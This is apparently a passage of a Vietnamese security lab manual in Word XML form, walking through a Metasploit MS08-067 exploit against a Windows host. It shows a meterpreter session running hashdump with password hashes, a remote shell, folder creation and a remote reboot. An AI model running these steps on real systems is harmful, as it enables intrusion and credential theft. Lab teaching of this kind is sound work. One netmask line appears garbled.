    <w:p w14:paraId="64B44A7B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thực hiện khai thác lỗ hổng (exploit) để tấn công từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739A3FB9" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8BA3C0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">hoặc </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B15ED38" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt; exploit -j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033A498D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>hoặc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E244F48" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(windows/smb/ms08_067_netapi) &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02026BAF" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">hoặc </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E9B99E" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(windows/smb/ms08_067_netapi) &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>run -j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E82C035" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2914B1FC" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A2630D">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="481E762F" wp14:editId="53A8D5CB">
            <wp:extent cx="5499383" cy="1416123"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="232533493" name="Picture 232533493"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33493" name="Picture 1" descr="A computer screen with text and numbers&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5499383" cy="1416123"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FCC66C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&gt;&gt; Khi chạy lệnh exploit không mà không kết nối được ngay, chạy lại lệnh này nhiều lần để cố gắng kết nối từ xa.</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
      </w:tblGrid>
      <w:tr w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w14:paraId="014A2017" w14:textId="77777777" w:rsidTr="00F22745">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1154E7B7" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="00F22745">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:color w:val="auto"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13BDC635" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>âm nhập hệ thống victim dựa trên meterpreter shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7269AD67" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi exploit thành công, Metasploit sẽ chạy payload được chọn. Nếu khai thác lổ hổng thành công sẽ xuất hiện meterpreter shell.  NSD có thể </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>thực hiện các lệnh điều khiển từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2E3F11" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>meterpreter &gt; help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18364DF6" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7659A796" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687F21CC" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Interface  1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70407622" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>============</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7400ED2F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Name         : MS TCP Loopback interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62982792" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Hardware MAC : 00:00:00:00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023303DA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>MTU          : 1520</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2786AD" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>IPv4 Address : 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59669BCD" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5073E91B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C27E4A" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Interface  2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05738952" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>============</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C67B740" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Name         : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EDEF62" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Hardware MAC : 00:0c:29:35:74:cb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50057A56" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>MTU          : 1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D331945" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>IPv4 Address : 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5D58B7" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="6A6B461F">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>IPv4 Netmask : 255.255.255.kdir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142126A5" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D44A54" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>admin:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29344FCF" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E68320" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6441550A" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>HelpAssistant:1000:1dd91531ddf512c0aeaf4b61d77eaaf2:f13746fcad3a9981b9e91799d1546f6b:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3968487C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:b44b14b0dba5764532ac9f0fd9c67d5a:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B18D71" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>user01:1004:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C246E" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>user02:1005:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295E7DE2" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>user03:1006:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29100C7D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BBD287" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="6A6B461F">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; cd c:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B886AF2" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7BA0F4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; mkdir c:\HoVaTen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DA7EB7" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; md cong nghe thong tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193C16AA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313E259D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; shutdown -r -t 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3835D82B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Shutting down...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B2C530" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Để xem </w:t>
      </w:r>
      <w:r w:rsidRPr="00501E1D">
        <w:t>lại</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve"> các session đang chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59437490" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>msf6 exploit(ms08_067_netapi) &gt; sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBA603" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">Mở lại session: </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Các thông tin của session sẽ được hiển thị ra, muốn truy cập lại vào session nào thì dùng lệnh:</w:t>
      </w:r>
    </w:p>
